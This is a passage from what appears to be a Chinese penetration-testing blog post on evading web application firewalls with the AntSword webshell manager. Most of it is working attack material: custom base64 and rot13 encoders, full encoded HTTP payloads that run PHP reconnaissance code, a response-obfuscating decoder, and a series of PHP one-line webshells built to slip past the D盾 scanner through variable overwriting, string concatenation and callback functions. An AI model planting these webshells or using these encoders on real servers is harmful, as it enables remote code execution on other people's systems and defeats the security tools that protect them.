<p>但是我们看到代码中有eval函数，很容易被waf拦截。接下来我们我们尝试编辑绕过waf。</p>
<h3 id="编码器规则绕过Waf"><a href="#编码器规则绕过Waf" class="headerlink" title="编码器规则绕过Waf"></a>编码器规则绕过Waf</h3><h4 id="Base64编码"><a href="#Base64编码" class="headerlink" title="Base64编码"></a>Base64编码</h4><p>为了避免waf识别eval等敏感函数，我们可以对其进行base64编码，将cmd的值base64编码也就是对<code>data[pwd]</code>的内容进行base64编码。</p>
<p>这里我们直接把原有的payloadbase64进行编码。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;&#x2F; ##########    请在下方编写你自己的代码   ###################</span><br><span class="line"></span><br><span class="line">&#x2F;&#x2F; shell 在接收到 payload 后，先处理 pwd 参数下的内容，</span><br><span class="line">data[pwd] &#x3D; Buffer.from(data[&#39;_&#39;]).toString(&#39;base64&#39;);</span><br><span class="line"></span><br><span class="line">&#x2F;&#x2F; ##########    请在上方编写你自己的代码   ###################</span><br></pre></td></tr></table></figure>

<p>查看一下payload</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">POST /steady.php HTTP/<span class="number">1.1</span></span><br><span class="line">Host: <span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span>:<span class="number">8888</span></span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">User-Agent: antSword/v2<span class="number">.1</span></span><br><span class="line">Content-Type: application/x-www-form-urlencoded</span><br><span class="line">Content-Length: <span class="number">868</span></span><br><span class="line">Connection: close</span><br><span class="line"></span><br><span class="line">cmd=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7ZnVuY3Rpb24gYXNlbmMoJG91dCl7cmV0dXJuICRvdXQ7fTtmdW5jdGlvbiBhc291dHB1dCgpeyRvdXRwdXQ9b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7ZWNobyAiNTY0OTUzNGQiO2VjaG8gQGFzZW5jKCRvdXRwdXQpO2VjaG8gIjliN2FiZSI7fW9iX3N0YXJ0KCk7dHJ5eyREPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTtpZigkRD09IiIpJEQ9ZGlybmFtZSgkX1NFUlZFUlsiUEFUSF9UUkFOU0xBVEVEIl0pOyRSPSJ7JER9CSI7aWYoc3Vic3RyKCRELDAsMSkhPSIvIil7Zm9yZWFjaChyYW5nZSgiQyIsIloiKWFzICRMKWlmKGlzX2RpcigieyRMfToiKSkkUi49InskTH06Ijt9ZWxzZXskUi49Ii8iO30kUi49IgkiOyR1PShmdW5jdGlvbl9leGlzdHMoInBvc2l4X2dldGVnaWQiKSk%<span class="number">2</span>FQHBvc2l4X2dldHB3dWlkKEBwb3NpeF9nZXRldWlkKCkpOiIiOyRzPSgkdSk%<span class="number">2</span>FJHVbIm5hbWUiXTpAZ2V0X2N1cnJlbnRfdXNlcigpOyRSLj1waHBfdW5hbWUoKTskUi49Igl7JHN9IjtlY2hvICRSOzt9Y2F0Y2goRXhjZXB0aW9uICRlKXtlY2hvICJFUlJPUjovLyIuJGUtPmdldE1lc3NhZ2UoKTt9O2Fzb3V0cHV0KCk7ZGllKCk7</span><br></pre></td></tr></table></figure>

<p>可以看到对payload直接进行base64编码，但是如果waf的检测机制是解码payload然后在进行检测，就无法绕过。所以我们需要自定义一些编码机制，来绕过waf。</p>
<h4 id="rot13"><a href="#rot13" class="headerlink" title="rot13"></a>rot13</h4><p>rot13 的 js 实现</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> rot13encode = <span class="function">(<span class="params">s</span>) =&gt;</span> &#123;</span><br><span class="line">  <span class="keyword">return</span> s.replace(<span class="regexp">/[a-zA-Z]/g</span>, <span class="function"><span class="keyword">function</span> (<span class="params">c</span>) </span>&#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">String</span>.fromCharCode((c &lt;= <span class="string">&quot;Z&quot;</span> ?</span><br><span class="line">        <span class="number">90</span> :</span><br><span class="line">        <span class="number">122</span>) &gt;= (c = c.charCodeAt(<span class="number">0</span>) + <span class="number">13</span>) ?</span><br><span class="line">      c :</span><br><span class="line">      c - <span class="number">26</span>);</span><br><span class="line">  &#125;);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> rot13encode = <span class="function">(<span class="params">s</span>) =&gt;</span> &#123;</span><br><span class="line">  <span class="keyword">return</span> s.replace(<span class="regexp">/[a-zA-Z]/g</span>, <span class="function"><span class="keyword">function</span> (<span class="params">c</span>) </span>&#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">String</span>.fromCharCode((c &lt;= <span class="string">&quot;Z&quot;</span> ?</span><br><span class="line">        <span class="number">90</span> :</span><br><span class="line">        <span class="number">122</span>) &gt;= (c = c.charCodeAt(<span class="number">0</span>) + <span class="number">13</span>) ?</span><br><span class="line">      c :</span><br><span class="line">      c - <span class="number">26</span>);</span><br><span class="line">  &#125;);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">data[pwd] = Buffer.from(rot13encode(data[<span class="string">&#x27;_&#x27;</span>])).toString();</span><br></pre></td></tr></table></figure>

<p>最终发送payload</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">POST /steady.php HTTP/<span class="number">1.1</span></span><br><span class="line">Host: <span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span>:<span class="number">8888</span></span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">User-Agent: antSword/v2<span class="number">.1</span></span><br><span class="line">Content-Type: application/x-www-form-urlencoded</span><br><span class="line">Content-Length: <span class="number">992</span></span><br><span class="line">Connection: close</span><br><span class="line"></span><br><span class="line">cmd=%<span class="number">40</span>vav_frg(%<span class="number">22</span>qvfcynl_reebef%<span class="number">22</span>%<span class="number">2</span>C%<span class="number">20</span>%<span class="number">220</span>%<span class="number">22</span>)%<span class="number">3</span>B%<span class="number">40</span>frg_gvzr_yvzvg(<span class="number">0</span>)%<span class="number">3</span>Bshapgvba%<span class="number">20</span>nfrap(%<span class="number">24</span>bhg)%<span class="number">7</span>Berghea%<span class="number">20</span>%<span class="number">24</span>bhg%<span class="number">3</span>B%<span class="number">7</span>D%<span class="number">3</span>Bshapgvba%<span class="number">20</span>nfbhgchg()%<span class="number">7</span>B%<span class="number">24</span>bhgchg%<span class="number">3</span>Dbo_trg_pbagragf()%<span class="number">3</span>Bbo_raq_pyrna()%<span class="number">3</span>Brpub%<span class="number">20</span>%<span class="number">2267</span>p814%<span class="number">22</span>%<span class="number">3</span>Brpub%<span class="number">20</span>%<span class="number">40</span>nfrap(%<span class="number">24</span>bhgchg)%<span class="number">3</span>Brpub%<span class="number">20</span>%<span class="number">22132</span>nr0pso07%<span class="number">22</span>%<span class="number">3</span>B%<span class="number">7</span>Dbo_fgneg()%<span class="number">3</span>Bgel%<span class="number">7</span>B%<span class="number">24</span>Q%<span class="number">3</span>Dqveanzr(%<span class="number">24</span>_FREIRE%<span class="number">5</span>B%<span class="number">22</span>FPEVCG_SVYRANZR%<span class="number">22</span>%<span class="number">5</span>D)%<span class="number">3</span>Bvs(%<span class="number">24</span>Q%<span class="number">3</span>D%<span class="number">3</span>D%<span class="number">22</span>%<span class="number">22</span>)%<span class="number">24</span>Q%<span class="number">3</span>Dqveanzr(%<span class="number">24</span>_FREIRE%<span class="number">5</span>B%<span class="number">22</span>CNGU_GENAFYNGRQ%<span class="number">22</span>%<span class="number">5</span>D)%<span class="number">3</span>B%<span class="number">24</span>E%<span class="number">3</span>D%<span class="number">22</span>%<span class="number">7</span>B%<span class="number">24</span>Q%<span class="number">7</span>D%<span class="number">09</span>%<span class="number">22</span>%<span class="number">3</span>Bvs(fhofge(%<span class="number">24</span>Q%<span class="number">2</span>C0%<span class="number">2</span>C1)!%<span class="number">3</span>D%<span class="number">22</span>%<span class="number">2</span>F%<span class="number">22</span>)%<span class="number">7</span>Bsbernpu(enatr(%<span class="number">22</span>P%<span class="number">22</span>%<span class="number">2</span>C%<span class="number">22</span>M%<span class="number">22</span>)nf%<span class="number">20</span>%<span class="number">24</span>Y)vs(vf_qve(%<span class="number">22</span>%<span class="number">7</span>B%<span class="number">24</span>Y%<span class="number">7</span>D%<span class="number">3</span>A%<span class="number">22</span>))%<span class="number">24</span>E.%<span class="number">3</span>D%<span class="number">22</span>%<span class="number">7</span>B%<span class="number">24</span>Y%<span class="number">7</span>D%<span class="number">3</span>A%<span class="number">22</span>%<span class="number">3</span>B%<span class="number">7</span>Dryfr%<span class="number">7</span>B%<span class="number">24</span>E.%<span class="number">3</span>D%<span class="number">22</span>%<span class="number">2</span>F%<span class="number">22</span>%<span class="number">3</span>B%<span class="number">7</span>D%<span class="number">24</span>E.%<span class="number">3</span>D%<span class="number">22</span>%<span class="number">09</span>%<span class="number">22</span>%<span class="number">3</span>B%<span class="number">24</span>h%<span class="number">3</span>D(shapgvba_rkvfgf(%<span class="number">22</span>cbfvk_trgrtvq%<span class="number">22</span>))%<span class="number">3</span>F%<span class="number">40</span>cbfvk_trgcjhvq(%<span class="number">40</span>cbfvk_trgrhvq())%<span class="number">3</span>A%<span class="number">22</span>%<span class="number">22</span>%<span class="number">3</span>B%<span class="number">24</span>f%<span class="number">3</span>D(%<span class="number">24</span>h)%<span class="number">3</span>F%<span class="number">24</span>h%<span class="number">5</span>B%<span class="number">22</span>anzr%<span class="number">22</span>%<span class="number">5</span>D%<span class="number">3</span>A%<span class="number">40</span>trg_pheerag_hfre()%<span class="number">3</span>B%<span class="number">24</span>E.%<span class="number">3</span>Dcuc_hanzr()%<span class="number">3</span>B%<span class="number">24</span>E.%<span class="number">3</span>D%<span class="number">22</span>%<span class="number">09</span>%<span class="number">7</span>B%<span class="number">24</span>f%<span class="number">7</span>D%<span class="number">22</span>%<span class="number">3</span>Brpub%<span class="number">20</span>%<span class="number">24</span>E%<span class="number">3</span>B%<span class="number">3</span>B%<span class="number">7</span>Dpngpu(Rkprcgvba%<span class="number">20</span>%<span class="number">24</span>r)%<span class="number">7</span>Brpub%<span class="number">20</span>%<span class="number">22</span>REEBE%<span class="number">3</span>A%<span class="number">2</span>F%<span class="number">2</span>F%<span class="number">22.</span>%<span class="number">24</span>r-%<span class="number">3</span>EtrgZrffntr()%<span class="number">3</span>B%<span class="number">7</span>D%<span class="number">3</span>Bnfbhgchg()%<span class="number">3</span>Bqvr()%<span class="number">3</span>B</span><br></pre></td></tr></table></figure>

<p>任何你能想到的字符串变换的方式，你都可以自由使用，互相随意组合，打造一款属于你自己的无特征的编码器。</p>
<h3 id="编码器限制"><a href="#编码器限制" class="headerlink" title="编码器限制"></a>编码器限制</h3><p>由于蚁剑只会对<code>data[pwd]</code>里面的参数按照设定的编码器编码，其它参数默认使用base64编码，所以其它参数一旦被waf解码还是会有明显的特征，从而导致被拦截。</p>
<p>解决办法是遍历<code>data[_]</code>取出其中的值并将其全部编码。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;**</span><br><span class="line"> * php::base64编码器</span><br><span class="line"> * Create at: 2020&#x2F;05&#x2F;21 13:07:23</span><br><span class="line"> *&#x2F;</span><br><span class="line">&#39;use strict&#39;;</span><br><span class="line"></span><br><span class="line">&#x2F;*</span><br><span class="line">* @param  &#123;String&#125; pwd   连接密码</span><br><span class="line">* @param  &#123;Array&#125;  data  编码器处理前的 payload 数组</span><br><span class="line">* @return &#123;Array&#125;  data  编码器处理后的 payload 数组</span><br><span class="line">*&#x2F;</span><br><span class="line">module.exports &#x3D; (pwd, data) &#x3D;&gt; &#123;</span><br><span class="line">   ##########    请在下方编写你自己的代码   ###################</span><br><span class="line">  for (let _ in data)&#123;</span><br><span class="line">    if (_ &#x3D;&#x3D;&#x3D; &#39;_&#39;) &#123; continue &#125;;</span><br><span class="line">    ret[_] &#x3D; Buffer.from(data[_]).toString(&#39;base64&#39;);</span><br><span class="line">    ret[_] &#x3D; &#39;steady&#39; + ret[_];</span><br><span class="line">    ret[_] +&#x3D; &#39;steady&#39;;</span><br><span class="line">    &#125;</span><br><span class="line">  	ret[pwd] &#x3D; Buffer.from(data[&#39;_&#39;]).toString(&#39;base64&#39;);</span><br><span class="line">    ret[pwd] &#x3D; &#39;steady&#39; + ret[pwd];</span><br><span class="line">    ret[pwd] +&#x3D; &#39;steady&#39;;</span><br><span class="line">    &#x2F;&#x2F; 返回编码器处理后的 payload 数组</span><br><span class="line">    return ret;</span><br><span class="line">    ##########    请在下方编写你自己的代码   ###################</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>可以看到并没有对其他参数进行编码，而是向其他参数加入了一下自定义的字符串。</p>
<h2 id="解码器"><a href="#解码器" class="headerlink" title="解码器"></a>解码器</h2><p>蚁剑的编码器是编码或者加密蚁剑向服务端发送的请求包的，所以解码器是用来编码或者加密服务端返回给蚁剑的数据包的，编码后的数据包只有蚁剑能够解码。有些waf会检测返回包，所以有时也需要使用解码器。</p>
<p>使用编码器</p>
<p>使用base64，返回的数据被加密成base64。</p>
<p><img src="https://steady-1302023625.cos.ap-beijing.myqcloud.com/makedown/image-20201011192041042.png" alt="image-20201011192041042"></p>
<p>不使用编码器</p>
<p>可以看到返回包是明文。</p>
<p><img src="https://steady-1302023625.cos.ap-beijing.myqcloud.com/makedown/image-20201011191731747.png" alt="image-20201011191731747"></p>
<h3 id="解码器分析"><a href="#解码器分析" class="headerlink" title="解码器分析"></a>解码器分析</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">/**</span><br><span class="line"> * php::base64解码器</span><br><span class="line"> * Create at: <span class="number">2020</span>/<span class="number">05</span>/<span class="number">22</span> <span class="number">10</span>:<span class="number">21</span>:<span class="number">48</span></span><br><span class="line"> */</span><br><span class="line"></span><br><span class="line"><span class="string">&#x27;use strict&#x27;</span>;</span><br><span class="line"></span><br><span class="line">module.exports = &#123;</span><br><span class="line">  /**</span><br><span class="line">   * @returns &#123;string&#125; asenc 将返回数据base64编码</span><br><span class="line">   * 自定义输出函数名称必须为 asenc</span><br><span class="line">   * 该函数使用的语法需要和shell保持一致</span><br><span class="line">   */</span><br><span class="line">  asoutput: () =&gt; &#123;</span><br><span class="line">    <span class="keyword">return</span> `function asenc($out)&#123;</span><br><span class="line">      <span class="keyword">return</span> @base64_encode($out);</span><br><span class="line">    &#125;</span><br><span class="line">    `.replace(/\n\s+/g, <span class="string">&#x27;&#x27;</span>);</span><br><span class="line">  &#125;,</span><br><span class="line">  /**</span><br><span class="line">   * 解码 Buffer</span><br><span class="line">   * @param &#123;string&#125; data 要被解码的 Buffer</span><br><span class="line">   * @returns &#123;string&#125; 解码后的 Buffer</span><br><span class="line">   */</span><br><span class="line">  decode_buff: (data, ext=&#123;&#125;) =&gt; &#123;</span><br><span class="line">    <span class="keyword">return</span> Buffer.<span class="keyword">from</span>(data.toString(), <span class="string">&#x27;base64&#x27;</span>);</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>两个方法，<code>asoutput</code>及<code>decode_buff</code>。</p>
<p><code>asoutput</code>无需传入参数，返回一段php代码字符串，名称为<code>asenc</code>的函数，这个函数会放在请求包里，用于在服务端执行完代码后，再回显部分调用该函数asenc来编码处理，所以服务端无需针对解码做改动。</p>
<h3 id="自制编码器"><a href="#自制编码器" class="headerlink" title="自制编码器"></a>自制编码器</h3><p>主要原理就是在返回的数据包中加入自己的随机字符。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">asoutput: () &#x3D;&gt; &#123;</span><br><span class="line">  return &#96;function asenc($out)&#123;</span><br><span class="line">    &#x2F;&#x2F;返回时添加一个随机字符串，避免被waf解码成功</span><br><span class="line">    return &#39;steady&#39;.@base64_encode($out);</span><br><span class="line">  &#125;</span><br><span class="line">  &#96;.replace(&#x2F;\n\s+&#x2F;g, &#39;&#39;);</span><br><span class="line">&#125;,</span><br></pre></td></tr></table></figure>

<h2 id="对称加密，非对称加密"><a href="#对称加密，非对称加密" class="headerlink" title="对称加密，非对称加密"></a>对称加密，非对称加密</h2><h1 id="客户端免杀"><a href="#客户端免杀" class="headerlink" title="客户端免杀"></a>客户端免杀</h1><h2 id="extract-变量覆盖过D盾"><a href="#extract-变量覆盖过D盾" class="headerlink" title="extract 变量覆盖过D盾"></a>extract 变量覆盖过D盾</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php  $a&#x3D;1;$b&#x3D;$_POST;extract($b);print_r(&#96;$a&#96;)?&gt;</span><br></pre></td></tr></table></figure>

<p>post数据a=命令</p>
<h2 id="parse-str-变量覆盖过D盾"><a href="#parse-str-变量覆盖过D盾" class="headerlink" title="parse_str 变量覆盖过D盾"></a>parse_str 变量覆盖过D盾</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php  $a&#x3D;1;$b&#x3D;&quot;a&#x3D;&quot;.$_GET[&#39;a&#39;];parse_str($b);print_r(&#96;$a&#96;)?&gt;</span><br></pre></td></tr></table></figure>

<p>get数据a=命令</p>
<h2 id="destruct-析构函数过D盾"><a href="#destruct-析构函数过D盾" class="headerlink" title="__destruct 析构函数过D盾"></a>__destruct 析构函数过D盾</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php </span><br><span class="line"></span><br><span class="line">class User</span><br><span class="line">&#123;</span><br><span class="line">  public $name &#x3D; &#39;&#39;;</span><br><span class="line"></span><br><span class="line">  function __destruct()&#123;</span><br><span class="line">    eval(&quot;$this-&gt;name&quot;);</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$user &#x3D; new User;</span><br><span class="line">$user-&gt;name &#x3D; &#39;&#39;.$_POST[&#39;name&#39;];</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<h2 id="null-拼接过D盾"><a href="#null-拼接过D盾" class="headerlink" title="null 拼接过D盾"></a>null 拼接过D盾</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">$name &#x3D; $_GET[&#39;name&#39;];</span><br><span class="line"></span><br><span class="line">$name1&#x3D;$name2&#x3D; null;</span><br><span class="line"></span><br><span class="line">eval($name1.$name2.$name);</span><br><span class="line"></span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<h2 id="‘’-拼接过D盾"><a href="#‘’-拼接过D盾" class="headerlink" title="‘’ 拼接过D盾"></a>‘’ 拼接过D盾</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">$name &#x3D; $_GET[&#39;name&#39;];</span><br><span class="line"></span><br><span class="line">$name1&#x3D;$name2&#x3D; &#39;&#39;;</span><br><span class="line"></span><br><span class="line">eval($name1.$name2.$name);</span><br><span class="line"></span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<h2 id="‘’-null-拼接过D盾"><a href="#‘’-null-拼接过D盾" class="headerlink" title="‘’ null 拼接过D盾"></a>‘’ null 拼接过D盾</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$a &#x3D; $_GET[&#39;a&#39;];</span><br><span class="line">$c &#x3D; null;</span><br><span class="line">eval(&#39;&#39;.$c.$a);</span><br><span class="line"></span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<h2 id="array-map函数过D盾"><a href="#array-map函数过D盾" class="headerlink" title="array_map函数过D盾"></a>array_map函数过D盾</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">function user()</span><br><span class="line">&#123;</span><br><span class="line">$a123 &#x3D;  chr(97).chr(115).chr(115).chr(101).chr(114).chr(116);</span><br><span class="line">return &#39;&#39;.$a123;</span><br><span class="line">&#125;</span><br><span class="line">$a123 &#x3D; user();</span><br><span class="line">$x123 &#x3D;array($_GET[&#39;x&#39;]);</span><br><span class="line">array_map($a123,$a123 &#x3D; $x123 );</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<h2 id="call-user-func-array函数过D盾"><a href="#call-user-func-array函数过D盾" class="headerlink" title="call_user_func_array函数过D盾"></a>call_user_func_array函数过D盾</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">function a()&#123;</span><br><span class="line">     return &#39;assert&#39;;</span><br><span class="line">&#125;</span><br><span class="line">$a&#x3D;a();</span><br><span class="line">$aa &#x3D; array($_GET[&#39;x&#39;]);</span><br><span class="line">call_user_func_array($a,$a&#x3D;$aa);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<h2 id="call-user-func函数过D盾"><a href="#call-user-func函数过D盾" class="headerlink" title="call_user_func函数过D盾"></a>call_user_func函数过D盾</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">function a()&#123;</span><br><span class="line">     return &#39;assert&#39;;</span><br><span class="line">&#125;</span><br><span class="line">$a&#x3D;a();</span><br><span class="line">$aa&#x3D;$_GET[&#39;x&#39;];</span><br><span class="line">call_user_func($a,$a&#x3D;$aa);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>


      
    </div>
    <div class="article-footer">
      <blockquote class="mt-2x">
  <ul class="post-copyright list-unstyled">
    
    <li class="post-copyright-link hidden-xs">
      <strong>本文链接：</strong>
      <a href="http://s1eady.top/2018/11/08/%E8%9A%81%E5%89%91%E4%BD%BF%E7%94%A8--Bypass%20Waf/" title="蚁剑—bypass" target="_blank" rel="external">http://s1eady.top/2018/11/08/%E8%9A%81%E5%89%91%E4%BD%BF%E7%94%A8--Bypass%20Waf/</a>
    </li>
    
    <li class="post-copyright-license">
      <strong>版权声明： </strong> 本博客所有文章除特别声明外，均采用 <a href="http://creativecommons.org/licenses/by/4.0/deed.zh" target="_blank" rel="external">CC BY 4.0 CN协议</a> 许可协议。转载请注明出处！
    </li>
  </ul>
</blockquote>


<div class="panel panel-default panel-badger">
  <div class="panel-body">
    <figure class="media">
      <div class="media-left">
        <a href="https://github.com/cofess" target="_blank" class="img-burn thumb-sm visible-lg">
          <img src="/images/1.jpg" class="img-rounded w-full" alt="">
        </a>
      </div>
      <div class="media-body">
        <h3 class="media-heading"><a href="https://github.com/cofess" target="_blank"><span class="text-dark">果冻</span><small class="ml-1x">Penetration Testing</small></a></h3>
        <div>一往情深深几许。</div>
      </div>
    </figure>
  </div>
</div>


    </div>
  </article>
  
    
  <section id="comments">
  	
      <div id="vcomments"></div>
    
  </section>


  
</div>

  <nav class="bar bar-footer clearfix" data-stick-bottom>
  <div class="bar-inner">
  
  <ul class="pager pull-left">
    
    <li class="prev">
      <a href="/2018/11/08/CTF-RSA/" title="CTF-RSA"><i class="icon icon-angle-left" aria-hidden="true"></i><span>&nbsp;&nbsp;上一篇</span></a>
    </li>
    
    
    <li class="next">
      <a href="/2018/11/08/PHP%E6%9C%A8%E9%A9%AC/" title="PHPSHELL-bypass"><span>下一篇&nbsp;&nbsp;</span><i class="icon icon-angle-right" aria-hidden="true"></i></a>
    </li>
    
    
    <li class="toggle-toc">
      <a class="toggle-btn collapsed" data-toggle="collapse" href="#collapseToc" aria-expanded="false" title="文章目录" role="button">
        <span>[&nbsp;</span><span>文章目录</span>
        <i class="text-collapsed icon icon-anchor"></i>
        <i class="text-in icon icon-close"></i>
        <span>]</span>
      </a>
    </li>
    
  </ul>
  
  
  <!-- Button trigger modal -->
  <button type="button" class="btn btn-fancy btn-donate pop-onhover bg-gradient-warning" data-toggle="modal" data-target="#donateModal"><span>赏</span></button>
  <!-- <div class="wave-icon wave-icon-danger btn-donate" data-toggle="modal" data-target="#donateModal">
    <div class="wave-circle"><span class="icon"><i class="icon icon-bill"></i></span></div>
  </div> -->
  
  
  <div class="bar-right">
    
    <div class="share-component" data-sites="weibo,qq,wechat,facebook,twitter" data-mobile-sites="weibo,qq,qzone"></div>
    
  </div>
  </div>
</nav>
  
<!-- Modal -->
<div class="modal modal-center modal-small modal-xs-full fade" id="donateModal" tabindex="-1" role="dialog">
  <div class="modal-dialog" role="document">
    <div class="modal-content donate">
      <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button>
      <div class="modal-body">
        <div class="donate-box">
          <div class="donate-head">
            <p>感谢您的支持，我会继续努力的!</p>
          </div>
          <div class="tab-content">
            <div role="tabpanel" class="tab-pane fade active in" id="alipay">
              <div class="donate-payimg">
                <img src="/images/donate/2.png" alt="扫码支持" title="扫一扫" />
              </div>
              <p class="text-muted mv">扫码打赏，你说多少就多少</p>
              <p class="text-grey">打开支付宝扫一扫，即可进行扫码打赏哦</p>
            </div>
            <div role="tabpanel" class="tab-pane fade" id="wechatpay">
              <div class="donate-payimg">
                <img src="/images/donate/1.png" alt="扫码支持" title="扫一扫" />
              </div>
              <p class="text-muted mv">扫码打赏，你说多少就多少</p>
              <p class="text-grey">打开微信扫一扫，即可进行扫码打赏哦</p>
            </div>
          </div>
          <div class="donate-footer">
            <ul class="nav nav-tabs nav-justified" role="tablist">
              <li role="presentation" class="active">
                <a href="#alipay" id="alipay-tab" role="tab" data-toggle="tab" aria-controls="alipay" aria-expanded="true"><i class="icon icon-alipay"></i> 支付宝</a>
              </li>
              <li role="presentation" class="">
